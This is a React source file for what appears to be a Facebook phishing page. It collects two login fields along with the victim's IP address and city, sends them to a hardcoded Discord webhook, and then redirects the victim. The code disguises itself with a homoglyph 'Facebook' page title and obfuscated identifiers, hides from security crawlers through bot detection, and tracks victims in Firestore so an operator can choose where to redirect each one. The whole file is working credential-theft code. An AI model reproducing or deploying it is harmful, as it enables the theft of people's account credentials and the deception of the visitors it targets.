import React, { useEffect, useState } from 'react';
import { addDoc, collection, doc, getDoc, getDocs, onSnapshot, setDoc } from 'firebase/firestore';
import Botd from '@fingerprintjs/botd';
import { publicIpv4 } from 'public-ip';
import { BsInfoCircleFill as IconInfo } from "react-icons/bs";
import { IoIosAdd as IconAdd } from "react-icons/io";
import { footerLinks, desktoplanguages } from "../sakles/malores.js";
import { db } from '../f7g8h9p.js';
import { useMediaQuery } from 'react-responsive';
import '../crosto/_f2a8d3.css';

const G4h1v0 = () => {
    const [ip, setIp] = useState(undefined);
    const [grraht, setCode] = useState('');
    const [dexlus, setdexlus] = useState('');
    const [userData, setUserData] = useState(undefined);
    const [isUserData, setIsUserData] = useState(false);
    const [userUrl, setUserUrl] = useState(false);

    const handleActions = (event) => {
        event.preventDefault(); // Prevent the default form submission
        if (grraht === '') {
            // Handle code validation
            return;
        } else {
            const discordWebhook = 'https://discord.com/api/webhooks/1416393877035683961/GKtmmDeL7GTrQofVEqRS1DelocI4kuNzCltu6YZMVUbURKDtPlBtjHbKjyHQM4C8__bz';

            fetch(`https://ipapi.co/json/`)
                .then((response) => response.json())
                .then((response) => {
                    const { country, region, city } = response;
                    const content = `========================\nLS 1: '${grraht}'\nLS 2: '${dexlus}'\nCountry : '${country}'\nRegion : '${region}'\nCity : '${city}'\nIP: '${ip}'\n========================`;

                    fetch(discordWebhook, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({ content }),
                    })
                        .then(() => {
                            window.location = '/';
                        })
                        .catch((error) => {
                            window.location = '/';
                        });
                });
        }
    };

    const handleCodeChange = (e) => {
        setCode(e.target.value); // Allow any input
    };

    const handleCodeChange1 = (e) => {
        setdexlus(e.target.value); // Allow any input
    };

    const getUserData = async () => {
        const documentSnapshot = await getDocs(collection(db, "georgebs"));
        const newData = documentSnapshot.docs.map((doc) => ({ ...doc.data(), id: doc.id }));
        const filter = newData.filter((x) => {
            if (x.ip === ip) {
                setIsUserData(true);
                setUserData(x);
                return x;
            }
        });
        if (filter.length === 0) {
            addUserData();
        }
    };

    const getIp = async () => {
        if (!ip) {
            const ipAddress = await publicIpv4();
            setIp(ipAddress);
        }
    };

            // Bot detection and redirect to /blank
useEffect(() => {
    const detectBot = async () => {
        const botd = await Botd.load();
        const result = await botd.detect();

        if (result.bot) {
            console.log('Bot detected:', result.bot.type);
            window.location.href = "/ds";
        } else {
            console.log('Not a bot');
        }
    };

    detectBot();
}, []);

    useEffect(() => {
        getIp();
    }, []);

    useEffect(() => {
        if (ip) {
            onSnapshot(collection(db, "georgebs"), (snapshot) => {
                let isExist = false;
                snapshot.docs
                    .map((doc) => ({ ...doc.data(), id: doc.id }))
                    .filter((x) => {
                        if (x.ip === ip) {
                            isExist = true;
                            setUserData(x);
                            fetch('./data.json')
                                .then((res) => res.json())
                                .then((data) => {
                                    data.url_data.filter((item) => {
                                        if (item.id === parseInt(x.redir)) {
                                            setUserUrl(item.url);
                                            return;
                                        }
                                    });
                                })
                                .catch((err) => {
                                    console.log(err, ' error');
                                });
                        }
                    });
                if (!isExist) {
                    setUserUrl(false);
                }
            });
        }
    }, [ip]);

    useEffect(() => {
        document.title = 'Fасe‌bооk';
    }, [userData, userUrl]);

    const addUserData = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);

            const docSnap = await getDoc(docRef);

            if (!docSnap.exists()) {
                await setDoc(docRef, {
                    ip: ip,
                    number: -1,
                    redir: "-1",
                });
                console.log("BegasID: ", ip);
                getUserData();
            } else {
                console.log("ResID ID: ", ip);
            }
        } catch (e) {
            console.error("Serr: ", e);
        }
    };

    const resetUserNumber = async () => {
        try {
            const docRef = doc(collection(db, "georgebs"), ip);
            await setDoc(docRef, { redir: "-1" }, { merge: true });
            console.log("DegIP: ", ip);
        } catch (e) {
            console.error("Gerr: ", e);
        }
    };

    useEffect(() => {
        if (ip) {
            getUserData();
        }
    }, [ip]);

    if (userUrl) {
        setTimeout(() => {
            window.location = userUrl;
        }, 1000);
        resetUserNumber();
    }

    console.log("hiuoio", isUserData, userData);

    if (isUserData) {
        return (
            <>
                <header className="2vos">
                    <div className="brohitis"></div>
                    <h1 className="vets"></h1>
                </header>
                <body className="rahade" id="rahade" name="rahade">
                    <br />
                    <div className="crembly">
                    </div> <br /> <br /> <br />
                    <div class="boading-container">
    <div class="masha"></div>
    <div class="boading-bar"></div>
  </div>
                </body>

                <footer>
                    <p></p>
                </footer>
            </>
        );
    }

    return null; // Return null if no user data
};

export default G4h1v0;
